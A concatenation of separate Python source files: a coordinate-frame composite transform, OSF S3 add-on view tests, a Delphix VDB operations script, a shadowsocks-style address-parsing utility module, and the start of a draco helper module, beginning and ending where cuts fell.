The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
priority : number
The priority if this transform when finding the shortest
coordinate transform path - large numbers are lower priorities.
register_graph : `TransformGraph` or `None`
A graph to register this transformation with on creation, or
`None` to leave it unregistered.
collapse_static_mats : bool
If `True`, consecutive `StaticMatrixTransform` will be collapsed into a
single transformation to speed up the calculation.
"""
def __init__(self, transforms, fromsys, tosys, priority=1,
register_graph=None, collapse_static_mats=True):
super(CompositeTransform, self).__init__(fromsys, tosys,
priority=priority,
register_graph=register_graph)
if collapse_static_mats:
transforms = self._combine_statics(transforms)
self.transforms = tuple(transforms)
def _combine_statics(self, transforms):
"""
Combines together sequences of `StaticMatrixTransform`s into a single
transform and returns it.
"""
newtrans = []
for currtrans in transforms:
lasttrans = newtrans[-1] if len(newtrans) > 0 else None
if (isinstance(lasttrans, StaticMatrixTransform) and
isinstance(currtrans, StaticMatrixTransform)):
combinedmat = np.dot(lasttrans.matrix, currtrans.matrix)
newtrans[-1] = StaticMatrixTransform(combinedmat,
lasttrans.fromsys,
currtrans.tosys)
else:
newtrans.append(currtrans)
return newtrans
def __call__(self, fromcoord, toframe):
curr_coord = fromcoord
for t in self.transforms:
#build an intermediate frame with attributes taken from either
#`fromframe`, or if not there, `toframe`, or if not there, use
#the defaults
#TODO: caching this information when creating the transform may
# speed things up a lot
frattrs = {}
for inter_frame_attr_nm in t.tosys.get_frame_attr_names():
if hasattr(toframe, inter_frame_attr_nm):
attr = getattr(toframe, inter_frame_attr_nm)
frattrs[inter_frame_attr_nm] = attr
elif hasattr(fromcoord, inter_frame_attr_nm):
attr = getattr(fromcoord, inter_frame_attr_nm)
frattrs[inter_frame_attr_nm] = attr
curr_toframe = t.tosys(**frattrs)
curr_coord = t(curr_coord, curr_toframe)
# this is safe even in the case where self.transforms is empty, because
# coordinate objects are immutible, so copying is not needed
return curr_coord
|
|
# -*- coding: utf-8 -*-
from rest_framework import status as http_status
from boto.exception import S3ResponseError
import mock
from nose.tools import (assert_equal, assert_equals,
assert_true, assert_in, assert_false)
import pytest
from framework.auth import Auth
from tests.base import OsfTestCase, get_default_metaschema
from osf_tests.factories import ProjectFactory, AuthUserFactory
from addons.base.tests.views import (
OAuthAddonConfigViewsTestCaseMixin
)
from addons.s3.tests.utils import S3AddonTestCase
from addons.s3.utils import validate_bucket_name, validate_bucket_location
from website.util import api_url_for
pytestmark = pytest.mark.django_db
class TestS3Views(S3AddonTestCase, OAuthAddonConfigViewsTestCaseMixin, OsfTestCase):
def setUp(self):
self.mock_can_list = mock.patch('addons.s3.views.utils.can_list')
self.mock_can_list.return_value = True
self.mock_can_list.start()
self.mock_uid = mock.patch('addons.s3.views.utils.get_user_info')
self.mock_uid.return_value = {'id': '1234567890', 'display_name': 's3.user'}
self.mock_uid.start()
self.mock_exists = mock.patch('addons.s3.views.utils.bucket_exists')
self.mock_exists.return_value = True
self.mock_exists.start()
super(TestS3Views, self).setUp()
def tearDown(self):
self.mock_can_list.stop()
self.mock_uid.stop()
self.mock_exists.stop()
super(TestS3Views, self).tearDown()
def test_s3_settings_input_empty_keys(self):
url = self.project.api_url_for('s3_add_user_account')
rv = self.app.post_json(url, {
'access_key': '',
'secret_key': ''
}, auth=self.user.auth, expect_errors=True)
assert_equals(rv.status_int, http_status.HTTP_400_BAD_REQUEST)
assert_in('All the fields above are required.', rv.body)
assert_equals(rv.status_int, http_status.HTTP_400_BAD_REQUEST)
def test_s3_settings_input_empty_access_key(self):
url = self.project.api_url_for('s3_add_user_account')
rv = self.app.post_json(url, {
'access_key': '',
'secret_key': 'Non-empty-secret-key'
}, auth=self.user.auth, expect_errors=True)
assert_equals(rv.status_int, http_status.HTTP_400_BAD_REQUEST)
assert_in('All the fields above are required.', rv.body)
assert_equals(rv.status_int, http_status.HTTP_400_BAD_REQUEST)
def test_s3_settings_input_empty_secret_key(self):
url = self.project.api_url_for('s3_add_user_account')
rv = self.app.post_json(url, {
'access_key': 'Non-empty-access-key',
'secret_key': ''
}, auth=self.user.auth, expect_errors=True)
assert_equals(rv.status_int, http_status.HTTP_400_BAD_REQUEST)
assert_in('All the fields above are required.', rv.body)
assert_equals(rv.status_int, http_status.HTTP_400_BAD_REQUEST)
def test_s3_set_bucket_no_settings(self):
user = AuthUserFactory()
self.project.add_contributor(user, save=True)
url = self.project.api_url_for('s3_set_config')
res = self.app.put_json(
url, {'s3_bucket': 'hammertofall'}, auth=user.auth,
expect_errors=True
)
assert_equal(res.status_code, http_status.HTTP_400_BAD_REQUEST)
def test_s3_set_bucket_no_auth(self):
user = AuthUserFactory()
user.add_addon('s3')
self.project.add_contributor(user, save=True)
url = self.project.api_url_for('s3_set_config')
res = self.app.put_json(
url, {'s3_bucket': 'hammertofall'}, auth=user.auth,
expect_errors=True
)
assert_equal(res.status_code, http_status.HTTP_403_FORBIDDEN)
def test_s3_set_bucket_registered(self):
registration = self.project.register_node(
get_default_metaschema(), Auth(self.user), '', ''
)
url = registration.api_url_for('s3_set_config')
res = self.app.put_json(
url, {'s3_bucket': 'hammertofall'}, auth=self.user.auth,
expect_errors=True,
)
assert_equal(res.status_code, http_status.HTTP_400_BAD_REQUEST)
@mock.patch('addons.s3.views.utils.can_list', return_value=False)
def test_user_settings_cant_list(self, mock_can_list):
url = api_url_for('s3_add_user_account')
rv = self.app.post_json(url, {
'access_key': 'aldkjf',
'secret_key': 'las'
}, auth=self.user.auth, expect_errors=True)
assert_in('Unable to list buckets.', rv.body)
assert_equals(rv.status_int, http_status.HTTP_400_BAD_REQUEST)
def test_s3_remove_node_settings_owner(self):
url = self.node_settings.owner.api_url_for('s3_deauthorize_node')
self.app.delete(url, auth=self.user.auth)
result = self.Serializer().serialize_settings(node_settings=self.node_settings, current_user=self.user)
assert_equal(result['nodeHasAuth'], False)
def test_s3_remove_node_settings_unauthorized(self):
url = self.node_settings.owner.api_url_for('s3_deauthorize_node')
ret = self.app.delete(url, auth=None, expect_errors=True)
assert_equal(ret.status_code, 401)
def test_s3_get_node_settings_owner(self):
self.node_settings.set_auth(self.external_account, self.user)
self.node_settings.folder_id = 'bucket'
self.node_settings.save()
url = self.node_settings.owner.api_url_for('s3_get_config')
res = self.app.get(url, auth=self.user.auth)
result = res.json['result']
assert_equal(result['nodeHasAuth'], True)
assert_equal(result['userIsOwner'], True)
assert_equal(result['folder']['path'], self.node_settings.folder_id)
def test_s3_get_node_settings_unauthorized(self):
url = self.node_settings.owner.api_url_for('s3_get_config')
unauthorized = AuthUserFactory()
ret = self.app.get(url, auth=unauthorized.auth, expect_errors=True)
assert_equal(ret.status_code, 403)
## Overrides ##
@mock.patch('addons.s3.models.get_bucket_names')
def test_folder_list(self, mock_names):
mock_names.return_value = ['bucket1', 'bucket2']
super(TestS3Views, self).test_folder_list()
@mock.patch('addons.s3.models.bucket_exists')
@mock.patch('addons.s3.models.get_bucket_location_or_error')
def test_set_config(self, mock_location, mock_exists):
mock_exists.return_value = True
mock_location.return_value = ''
self.node_settings.set_auth(self.external_account, self.user)
url = self.project.api_url_for('{0}_set_config'.format(self.ADDON_SHORT_NAME))
res = self.app.put_json(url, {
'selected': self.folder
}, auth=self.user.auth)
assert_equal(res.status_code, http_status.HTTP_200_OK)
self.project.reload()
self.node_settings.reload()
assert_equal(
self.project.logs.latest().action,
'{0}_bucket_linked'.format(self.ADDON_SHORT_NAME)
)
assert_equal(res.json['result']['folder']['name'], self.node_settings.folder_name)
class TestCreateBucket(S3AddonTestCase, OsfTestCase):
def setUp(self):
super(TestCreateBucket, self).setUp()
self.user = AuthUserFactory()
self.consolidated_auth = Auth(user=self.user)
self.auth = self.user.auth
self.project = ProjectFactory(creator=self.user)
self.project.add_addon('s3', auth=self.consolidated_auth)
self.project.creator.add_addon('s3')
self.user_settings = self.user.get_addon('s3')
self.user_settings.access_key = 'We-Will-Rock-You'
self.user_settings.secret_key = 'Idontknowanyqueensongs'
self.user_settings.save()
self.node_settings = self.project.get_addon('s3')
self.node_settings.bucket = 'Sheer-Heart-Attack'
self.node_settings.user_settings = self.project.creator.get_addon('s3')
self.node_settings.save()
def test_bad_names(self):
assert_false(validate_bucket_name(''))
assert_false(validate_bucket_name('no'))
assert_false(validate_bucket_name('a' * 64))
assert_false(validate_bucket_name(' leadingspace'))
assert_false(validate_bucket_name('trailingspace '))
assert_false(validate_bucket_name('bogus naMe'))
assert_false(validate_bucket_name('.cantstartwithp'))
assert_false(validate_bucket_name('or.endwith.'))
assert_false(validate_bucket_name('..nodoubles'))
assert_false(validate_bucket_name('no_unders_in'))
assert_false(validate_bucket_name('-leadinghyphen'))
assert_false(validate_bucket_name('trailinghyphen-'))
assert_false(validate_bucket_name('Mixedcase'))
assert_false(validate_bucket_name('empty..label'))
assert_false(validate_bucket_name('label-.trailinghyphen'))
assert_false(validate_bucket_name('label.-leadinghyphen'))
assert_false(validate_bucket_name('8.8.8.8'))
assert_false(validate_bucket_name('600.9000.0.28'))
assert_false(validate_bucket_name('no_underscore'))
assert_false(validate_bucket_name('_nounderscoreinfront'))
assert_false(validate_bucket_name('no-underscore-in-back_'))
assert_false(validate_bucket_name('no-underscore-in_the_middle_either'))
def test_names(self):
assert_true(validate_bucket_name('imagoodname'))
assert_true(validate_bucket_name('still.passing'))
assert_true(validate_bucket_name('can-have-dashes'))
assert_true(validate_bucket_name('kinda.name.spaced'))
assert_true(validate_bucket_name('a-o.valid'))
assert_true(validate_bucket_name('11.12.m'))
assert_true(validate_bucket_name('a--------a'))
assert_true(validate_bucket_name('a' * 63))
def test_bad_locations(self):
assert_false(validate_bucket_location('Venus'))
assert_false(validate_bucket_location('AlphaCentari'))
assert_false(validate_bucket_location('CostaRica'))
def test_locations(self):
assert_true(validate_bucket_location(''))
assert_true(validate_bucket_location('eu-central-1'))
assert_true(validate_bucket_location('ca-central-1'))
assert_true(validate_bucket_location('us-west-1'))
assert_true(validate_bucket_location('us-west-2'))
assert_true(validate_bucket_location('ap-northeast-1'))
assert_true(validate_bucket_location('ap-northeast-2'))
assert_true(validate_bucket_location('ap-southeast-1'))
assert_true(validate_bucket_location('ap-southeast-2'))
assert_true(validate_bucket_location('sa-east-1'))
assert_true(validate_bucket_location('eu-west-1'))
assert_true(validate_bucket_location('eu-west-2'))
@mock.patch('addons.s3.views.utils.create_bucket')
@mock.patch('addons.s3.views.utils.get_bucket_names')
def test_create_bucket_pass(self, mock_names, mock_make):
mock_make.return_value = True
mock_names.return_value = [
'butintheend',
'it',
'doesntevenmatter'
]
url = self.project.api_url_for('create_bucket')
ret = self.app.post_json(
url,
{
'bucket_name': 'doesntevenmatter',
'bucket_location': '',
},
auth=self.user.auth
)
assert_equal(ret.status_int, http_status.HTTP_200_OK)
assert_equal(ret.json, {})
@mock.patch('addons.s3.views.utils.create_bucket')
def test_create_bucket_fail(self, mock_make):
error = S3ResponseError(418, 'because Im a test')
error.message = 'This should work'
mock_make.side_effect = error
url = '/api/v1/project/{0}/s3/newbucket/'.format(self.project._id)
ret = self.app.post_json(url, {'bucket_name': 'doesntevenmatter'}, auth=self.user.auth, expect_errors=True)
assert_equals(ret.body, '{"message": "This should work", "title": "Problem connecting to S3"}')
@mock.patch('addons.s3.views.utils.create_bucket')
def test_bad_location_fails(self, mock_make):
url = '/api/v1/project/{0}/s3/newbucket/'.format(self.project._id)
ret = self.app.post_json(
url,
{
'bucket_name': 'doesntevenmatter',
'bucket_location': 'not a real bucket location',
},
auth=self.user.auth,
expect_errors=True)
assert_equals(ret.body, '{"message": "That bucket location is not valid.", "title": "Invalid bucket location"}')
|
|
#!/usr/bin/env python
# Corey Brune - Oct 2016
#This script starts or stops a VDB
#requirements
#pip install docopt delphixpy
#The below doc follows the POSIX compliant standards and allows us to use
#this doc to also define our arguments for the script.
"""List all VDBs or Start, stop, enable, disable a VDB
Usage:
dx_operations_vdb.py (--vdb <name> [--stop | --start | --enable | --disable] | --list | --all_dbs <name>)
[-d <identifier> | --engine <identifier> | --all]
[--debug] [--parallel <n>] [--poll <n>]
[--config <path_to_file>] [--logdir <path_to_file>]
dx_operations_vdb.py -h | --help | -v | --version
List all VDBs, start, stop, enable, disable a VDB
Examples:
dx_operations_vdb.py --engine landsharkengine --vdb testvdb --stop
dx_operations_vdb.py --vdb testvdb --start
dx_operations_vdb.py --all_dbs enable
dx_operations_vdb.py --all_dbs disable
dx_operations_vdb.py --list
Options:
--vdb <name> Name of the VDB to stop or start
--start Stop the VDB
--stop Stop the VDB
--all_dbs <name> Enable or disable all dSources and VDBs
--list List all databases from an engine
--enable Enable the VDB
--disable Disable the VDB
-d <identifier> Identifier of Delphix engine in dxtools.conf.
--engine <type> Alt Identifier of Delphix engine in dxtools.conf.
--all Run against all engines.
--debug Enable debug logging
--parallel <n> Limit number of jobs to maxjob
--poll <n> The number of seconds to wait between job polls
[default: 10]
--config <path_to_file> The path to the dxtools.conf file
[default: ./dxtools.conf]
--logdir <path_to_file> The path to the logfile you want to use.
[default: ./dx_operations_vdb.log]
-h --help Show this screen.
-v --version Show version.
"""
VERSION = 'v.0.3.002'
import sys
from os.path import basename
from time import sleep, time
from delphixpy.v1_8_0.exceptions import HttpError
from delphixpy.v1_8_0.exceptions import JobError
from delphixpy.v1_8_0.exceptions import RequestError
from delphixpy.v1_8_0.web import database
from delphixpy.v1_8_0.web import job
from delphixpy.v1_8_0.web import source
from delphixpy.v1_8_0.web.capacity import consumer
from docopt import docopt
from lib.DlpxException import DlpxException
from lib.DxLogging import logging_est
from lib.DxLogging import print_debug
from lib.DxLogging import print_info
from lib.DxLogging import print_exception
from lib.GetReferences import find_obj_by_name
from lib.GetReferences import find_all_objects
from lib.GetReferences import find_obj_list
from lib.GetReferences import find_source_by_dbname
from lib.GetSession import GetSession
def vdb_operation(vdb_name, operation):
"""
Function to start, stop, enable or disable a VDB
"""
print_debug('Searching for {} reference.\n'.format(vdb_name))
vdb_obj = find_source_by_dbname(dx_session_obj.server_session, database, vdb_name)
try:
if vdb_obj:
if operation == 'start':
source.start(dx_session_obj.server_session, vdb_obj.reference)
elif operation == 'stop':
source.stop(dx_session_obj.server_session, vdb_obj.reference)
elif operation == 'enable':
source.enable(dx_session_obj.server_session, vdb_obj.reference)
elif operation == 'disable':
source.disable(dx_session_obj.server_session,
vdb_obj.reference)
dx_session_obj.jobs[dx_session_obj.server_session.address] = \
dx_session_obj.server_session.last_job
except (RequestError, HttpError, JobError, AttributeError), e:
print('An error occurred while performing {} on {}.:'
'{}\n'.format(operation, vdb_name, e))
def all_databases(operation):
"""
Enable or disable all dSources and VDBs on an engine
operation: enable or disable dSources and VDBs
"""
for db in database.get_all(dx_session_obj.server_session, no_js_container_data_source=True):
print '{} {}\n'.format(operation, db.name)
vdb_operation(db.name, operation)
sleep(2)
def list_databases():
"""
Function to list all databases for a given engine
"""
source_stats_lst = find_all_objects(dx_session_obj.server_session, source)
is_dSource = None
try:
for db_stats in find_all_objects(dx_session_obj.server_session,
consumer):
source_stats = find_obj_list(source_stats_lst, db_stats.name)
if source_stats is not None:
if source_stats.virtual is False:
is_dSource = 'dSource'
elif source_stats.virtual is True:
is_dSource = db_stats.parent
print('name = {}\nprovision container= {}\ndatabase disk '
'usage: {:.2f} GB\nSize of Snapshots: {:.2f} GB\n'
'Enabled: {}\nStatus:{}\n'.format(str(db_stats.name),
str(is_dSource),
db_stats.breakdown.active_space / 1024 / 1024 / 1024,
db_stats.breakdown.sync_space / 1024 / 1024 / 1024,
source_stats.runtime.enabled,
source_stats.runtime.status))
elif source_stats is None:
print('name = {}\nprovision container= {}\ndatabase disk '
'usage: {:.2f} GB\nSize of Snapshots: {:.2f} GB\n'
'Could not find source information. This could be a '
'result of an unlinked object.\n'.format(
str(db_stats.name), str(db_stats.parent),
db_stats.breakdown.active_space / 1024 / 1024 / 1024,
db_stats.breakdown.sync_space / 1024 / 1024 / 1024))
except (RequestError, JobError, AttributeError, DlpxException) as e:
print 'An error occurred while listing databases: {}'.format((e))
def run_async(func):
"""
http://code.activestate.com/recipes/576684-simple-threading-decorator/
run_async(func)
function decorator, intended to make "func" run in a separate
thread (asynchronously).
Returns the created Thread object
E.g.:
@run_async
def task1():
do_something
@run_async
def task2():
do_something_too
t1 = task1()
t2 = task2()
...
t1.join()
t2.join()
"""
from threading import Thread
from functools import wraps
@wraps(func)
def async_func(*args, **kwargs):
func_hl = Thread(target = func, args = args, kwargs = kwargs)
func_hl.start()
return func_hl
return async_func
@run_async
def main_workflow(engine):
"""
This function actually runs the jobs.
Use the @run_async decorator to run this function asynchronously.
This allows us to run against multiple Delphix Engine simultaneously
engine: Dictionary of engines
"""
jobs = {}
try:
#Setup the connection to the Delphix Engine
dx_session_obj.serversess(engine['ip_address'], engine['username'],
engine['password'])
except DlpxException as e:
print_exception('\nERROR: Engine {} encountered an error while'
'{}:\n{}\n'.format(engine['hostname'],
arguments['--target'], e))
sys.exit(1)
thingstodo = ["thingtodo"]
with dx_session_obj.job_mode(single_thread):
while len(dx_session_obj.jobs) > 0 or len(thingstodo) > 0:
if len(thingstodo)> 0:
if arguments['--start']:
vdb_operation(arguments['--vdb'], 'start')
elif arguments['--stop']:
vdb_operation(arguments['--vdb'], 'stop')
elif arguments['--enable']:
vdb_operation(arguments['--vdb'], 'enable')
elif arguments['--disable']:
vdb_operation(arguments['--vdb'], 'disable')
elif arguments['--list']:
list_databases()
elif arguments['--all_dbs']:
try:
assert arguments['--all_dbs'] in 'disable' or \
arguments['--all_dbs'] in 'enable', \
'--all_dbs should be either enable or disable'
all_databases(arguments['--all_dbs'])
except AssertionError as e:
print 'ERROR:\n{}\n'.format(e)
sys.exit(1)
thingstodo.pop()
#get all the jobs, then inspect them
i = 0
for j in dx_session_obj.jobs.keys():
job_obj = job.get(dx_session_obj.server_session,
dx_session_obj.jobs[j])
print_debug(job_obj)
print_info('{}: Operations: {}'.format(engine['hostname'],
job_obj.job_state))
if job_obj.job_state in ["CANCELED", "COMPLETED", "FAILED"]:
#If the job is in a non-running state, remove it from the
# running jobs list.
del dx_session_obj.jobs[j]
elif job_obj.job_state in 'RUNNING':
#If the job is in a running state, increment the running
# job count.
i += 1
print_info('{}: {:d} jobs running.'.format(
engine['hostname'], i))
#If we have running jobs, pause before repeating the checks.
if len(dx_session_obj.jobs) > 0:
sleep(float(arguments['--poll']))
def run_job():
"""
This function runs the main_workflow aynchronously against all the servers
specified
"""
#Create an empty list to store threads we create.
threads = []
engine = None
#If the --all argument was given, run against every engine in dxtools.conf
if arguments['--all']:
print_info("Executing against all Delphix Engines in the dxtools.conf")
try:
#For each server in the dxtools.conf...
for delphix_engine in dx_session_obj.dlpx_engines:
engine = dx_session_obj[delphix_engine]
#Create a new thread and add it to the list.
threads.append(main_workflow(engine))
except DlpxException as e:
print 'Error encountered in run_job():\n{}'.format(e)
sys.exit(1)
elif arguments['--all'] is False:
#Else if the --engine argument was given, test to see if the engine
# exists in dxtools.conf
if arguments['--engine']:
try:
engine = dx_session_obj.dlpx_engines[arguments['--engine']]
print_info('Executing against Delphix Engine: {}\n'.format(
(arguments['--engine'])))
except (DlpxException, RequestError, KeyError) as e:
raise DlpxException('\nERROR: Delphix Engine {} cannot be '
'found in {}. Please check your value '
'and try again. Exiting.\n'.format(
arguments['--engine'], config_file_path))
else:
#Else search for a default engine in the dxtools.conf
for delphix_engine in dx_session_obj.dlpx_engines:
if dx_session_obj.dlpx_engines[delphix_engine]['default'] == \
'true':
engine = dx_session_obj.dlpx_engines[delphix_engine]
print_info('Executing against the default Delphix Engine '
'in the dxtools.conf: {}'.format(
dx_session_obj.dlpx_engines[delphix_engine]['hostname']))
break
if engine == None:
raise DlpxException("\nERROR: No default engine found. Exiting")
#run the job against the engine
threads.append(main_workflow(engine))
#For each thread in the list...
for each in threads:
#join them back together so that we wait for all threads to complete
# before moving on
each.join()
def time_elapsed():
"""
This function calculates the time elapsed since the beginning of the script.
Call this anywhere you want to note the progress in terms of time
"""
#elapsed_minutes = round((time() - time_start)/60, +1)
#return elapsed_minutes
return round((time() - time_start)/60, +1)
def main(arguments):
#We want to be able to call on these variables anywhere in the script.
global single_thread
global usebackup
global time_start
global config_file_path
global dx_session_obj
global debug
if arguments['--debug']:
debug = True
try:
dx_session_obj = GetSession()
logging_est(arguments['--logdir'])
print_debug(arguments)
time_start = time()
engine = None
single_thread = False
config_file_path = arguments['--config']
#Parse the dxtools.conf and put it into a dictionary
dx_session_obj.get_config(config_file_path)
#This is the function that will handle processing main_workflow for
# all the servers.
run_job()
#elapsed_minutes = time_elapsed()
print_info('script took {:.2f} minutes to get this far.'.format(
time_elapsed()))
#Here we handle what we do when the unexpected happens
except SystemExit as e:
"""
This is what we use to handle our sys.exit(#)
"""
sys.exit(e)
except HttpError as e:
"""
We use this exception handler when our connection to Delphix fails
"""
print_exception('Connection failed to the Delphix Engine'
'Please check the ERROR message:\n{}\n').format(e)
sys.exit(1)
except JobError as e:
"""
We use this exception handler when a job fails in Delphix so that
we have actionable data
"""
elapsed_minutes = time_elapsed()
print_exception('A job failed in the Delphix Engine')
print_info('{} took {:.2f} minutes to get this far:\n{}\n'.format(
basename(__file__), elapsed_minutes, e))
sys.exit(3)
except KeyboardInterrupt:
"""
We use this exception handler to gracefully handle ctrl+c exits
"""
print_debug("You sent a CTRL+C to interrupt the process")
elapsed_minutes = time_elapsed()
print_info('{} took {:.2f} minutes to get this far\n'.format(
basename(__file__), elapsed_minutes))
except:
"""
Everything else gets caught here
"""
print_exception(sys.exc_info()[0])
elapsed_minutes = time_elapsed()
print_info('{} took {:.2f} minutes to get this far\n'.format(
basename(__file__), elapsed_minutes))
sys.exit(1)
if __name__ == "__main__":
#Grab our arguments from the doc at the top of the script
arguments = docopt(__doc__, version=basename(__file__) + " " + VERSION)
#Feed our arguments to the main function, and off we go!
main(arguments)
|
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2013-2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import socket
import struct
import logging
import hashlib
import hmac
ONETIMEAUTH_BYTES = 10
ONETIMEAUTH_CHUNK_BYTES = 12
ONETIMEAUTH_CHUNK_DATA_LEN = 2
def sha1_hmac(secret, data):
return hmac.new(secret, data, hashlib.sha1).digest()
def onetimeauth_verify(_hash, data, key):
return _hash == sha1_hmac(key, data)[:ONETIMEAUTH_BYTES]
def onetimeauth_gen(data, key):
return sha1_hmac(key, data)[:ONETIMEAUTH_BYTES]
def compat_ord(s):
if type(s) == int:
return s
return _ord(s)
def compat_chr(d):
if bytes == str:
return _chr(d)
return bytes([d])
_ord = ord
_chr = chr
ord = compat_ord
chr = compat_chr
def to_bytes(s):
if bytes != str:
if type(s) == str:
return s.encode('utf-8')
return s
def to_str(s):
if bytes != str:
if type(s) == bytes:
return s.decode('utf-8')
return s
def inet_ntop(family, ipstr):
if family == socket.AF_INET:
return to_bytes(socket.inet_ntoa(ipstr))
elif family == socket.AF_INET6:
import re
v6addr = ':'.join(('%02X%02X' % (ord(i), ord(j))).lstrip('0')
for i, j in zip(ipstr[::2], ipstr[1::2]))
v6addr = re.sub('::+', '::', v6addr, count=1)
return to_bytes(v6addr)
def inet_pton(family, addr):
addr = to_str(addr)
if family == socket.AF_INET:
return socket.inet_aton(addr)
elif family == socket.AF_INET6:
if '.' in addr: # a v4 addr
v4addr = addr[addr.rindex(':') + 1:]
v4addr = socket.inet_aton(v4addr)
v4addr = map(lambda x: ('%02X' % ord(x)), v4addr)
v4addr.insert(2, ':')
newaddr = addr[:addr.rindex(':') + 1] + ''.join(v4addr)
return inet_pton(family, newaddr)
dbyts = [0] * 8 # 8 groups
grps = addr.split(':')
for i, v in enumerate(grps):
if v:
dbyts[i] = int(v, 16)
else:
for j, w in enumerate(grps[::-1]):
if w:
dbyts[7 - j] = int(w, 16)
else:
break
break
return b''.join((chr(i // 256) + chr(i % 256)) for i in dbyts)
else:
raise RuntimeError("What family?")
def is_ip(address):
for family in (socket.AF_INET, socket.AF_INET6):
try:
if type(address) != str:
address = address.decode('utf8')
inet_pton(family, address)
return family
except (TypeError, ValueError, OSError, IOError):
pass
return False
def patch_socket():
if not hasattr(socket, 'inet_pton'):
socket.inet_pton = inet_pton
if not hasattr(socket, 'inet_ntop'):
socket.inet_ntop = inet_ntop
patch_socket()
ADDRTYPE_IPV4 = 0x01
ADDRTYPE_IPV6 = 0x04
ADDRTYPE_HOST = 0x03
ADDRTYPE_AUTH = 0x10
ADDRTYPE_MASK = 0xF
def pack_addr(address):
address_str = to_str(address)
for family in (socket.AF_INET, socket.AF_INET6):
try:
r = socket.inet_pton(family, address_str)
if family == socket.AF_INET6:
return b'\x04' + r
else:
return b'\x01' + r
except (TypeError, ValueError, OSError, IOError):
pass
if len(address) > 255:
address = address[:255] # TODO
return b'\x03' + chr(len(address)) + address
def parse_header(data):
addrtype = ord(data[0])
dest_addr = None
dest_port = None
header_length = 0
if addrtype & ADDRTYPE_MASK == ADDRTYPE_IPV4:
if len(data) >= 7:
dest_addr = socket.inet_ntoa(data[1:5])
dest_port = struct.unpack('>H', data[5:7])[0]
header_length = 7
else:
logging.warn('header is too short')
elif addrtype & ADDRTYPE_MASK == ADDRTYPE_HOST:
if len(data) > 2:
addrlen = ord(data[1])
if len(data) >= 4 + addrlen:
dest_addr = data[2:2 + addrlen]
dest_port = struct.unpack('>H', data[2 + addrlen:4 +
addrlen])[0]
header_length = 4 + addrlen
else:
logging.warn('header is too short')
else:
logging.warn('header is too short')
elif addrtype & ADDRTYPE_MASK == ADDRTYPE_IPV6:
if len(data) >= 19:
dest_addr = socket.inet_ntop(socket.AF_INET6, data[1:17])
dest_port = struct.unpack('>H', data[17:19])[0]
header_length = 19
else:
logging.warn('header is too short')
else:
logging.warn('unsupported addrtype %d, maybe wrong password or '
'encryption method' % addrtype)
if dest_addr is None:
return None
return addrtype, to_bytes(dest_addr), dest_port, header_length
class IPNetwork(object):
ADDRLENGTH = {socket.AF_INET: 32, socket.AF_INET6: 128, False: 0}
def __init__(self, addrs):
self._network_list_v4 = []
self._network_list_v6 = []
if type(addrs) == str:
addrs = addrs.split(',')
list(map(self.add_network, addrs))
def add_network(self, addr):
if addr is "":
return
block = addr.split('/')
addr_family = is_ip(block[0])
addr_len = IPNetwork.ADDRLENGTH[addr_family]
if addr_family is socket.AF_INET:
ip, = struct.unpack("!I", socket.inet_aton(block[0]))
elif addr_family is socket.AF_INET6:
hi, lo = struct.unpack("!QQ", inet_pton(addr_family, block[0]))
ip = (hi << 64) | lo
else:
raise Exception("Not a valid CIDR notation: %s" % addr)
if len(block) is 1:
prefix_size = 0
while (ip & 1) == 0 and ip is not 0:
ip >>= 1
prefix_size += 1
logging.warn("You did't specify CIDR routing prefix size for %s, "
"implicit treated as %s/%d" % (addr, addr, addr_len))
elif block[1].isdigit() and int(block[1]) <= addr_len:
prefix_size = addr_len - int(block[1])
ip >>= prefix_size
else:
raise Exception("Not a valid CIDR notation: %s" % addr)
if addr_family is socket.AF_INET:
self._network_list_v4.append((ip, prefix_size))
else:
self._network_list_v6.append((ip, prefix_size))
def __contains__(self, addr):
addr_family = is_ip(addr)
if addr_family is socket.AF_INET:
ip, = struct.unpack("!I", socket.inet_aton(addr))
return any(map(lambda n_ps: n_ps[0] == ip >> n_ps[1],
self._network_list_v4))
elif addr_family is socket.AF_INET6:
hi, lo = struct.unpack("!QQ", inet_pton(addr_family, addr))
ip = (hi << 64) | lo
return any(map(lambda n_ps: n_ps[0] == ip >> n_ps[1],
self._network_list_v6))
else:
return False
def test_inet_conv():
ipv4 = b'8.8.4.4'
b = inet_pton(socket.AF_INET, ipv4)
assert inet_ntop(socket.AF_INET, b) == ipv4
ipv6 = b'2404:6800:4005:805::1011'
b = inet_pton(socket.AF_INET6, ipv6)
assert inet_ntop(socket.AF_INET6, b) == ipv6
def test_parse_header():
assert parse_header(b'\x03\x0ewww.google.com\x00\x50') == \
(3, b'www.google.com', 80, 18)
assert parse_header(b'\x01\x08\x08\x08\x08\x00\x35') == \
(1, b'8.8.8.8', 53, 7)
assert parse_header((b'\x04$\x04h\x00@\x05\x08\x05\x00\x00\x00\x00\x00'
b'\x00\x10\x11\x00\x50')) == \
(4, b'2404:6800:4005:805::1011', 80, 19)
def test_pack_header():
assert pack_addr(b'8.8.8.8') == b'\x01\x08\x08\x08\x08'
assert pack_addr(b'2404:6800:4005:805::1011') == \
b'\x04$\x04h\x00@\x05\x08\x05\x00\x00\x00\x00\x00\x00\x10\x11'
assert pack_addr(b'www.google.com') == b'\x03\x0ewww.google.com'
def test_ip_network():
ip_network = IPNetwork('127.0.0.0/24,::ff:1/112,::1,192.168.1.1,192.0.2.0')
assert '127.0.0.1' in ip_network
assert '127.0.1.1' not in ip_network
assert ':ff:ffff' in ip_network
assert '::ffff:1' not in ip_network
assert '::1' in ip_network
assert '::2' not in ip_network
assert '192.168.1.1' in ip_network
assert '192.168.1.2' not in ip_network
assert '192.0.2.1' in ip_network
assert '192.0.3.1' in ip_network # 192.0.2.0 is treated as 192.0.2.0/23
assert 'www.google.com' not in ip_network
if __name__ == '__main__':
test_inet_conv()
test_parse_header()
test_pack_header()
test_ip_network()
|
|
"""Collection of miscellaneous routines.
Miscellaneous tasks should be placed in :py:mod:`draco.core.misc`.
"""
import numpy as np
from numpy.lib.recfunctions import structured_to_unstructured
from ._fast_tools import _calc_redundancy
def cmap(i, j, n):
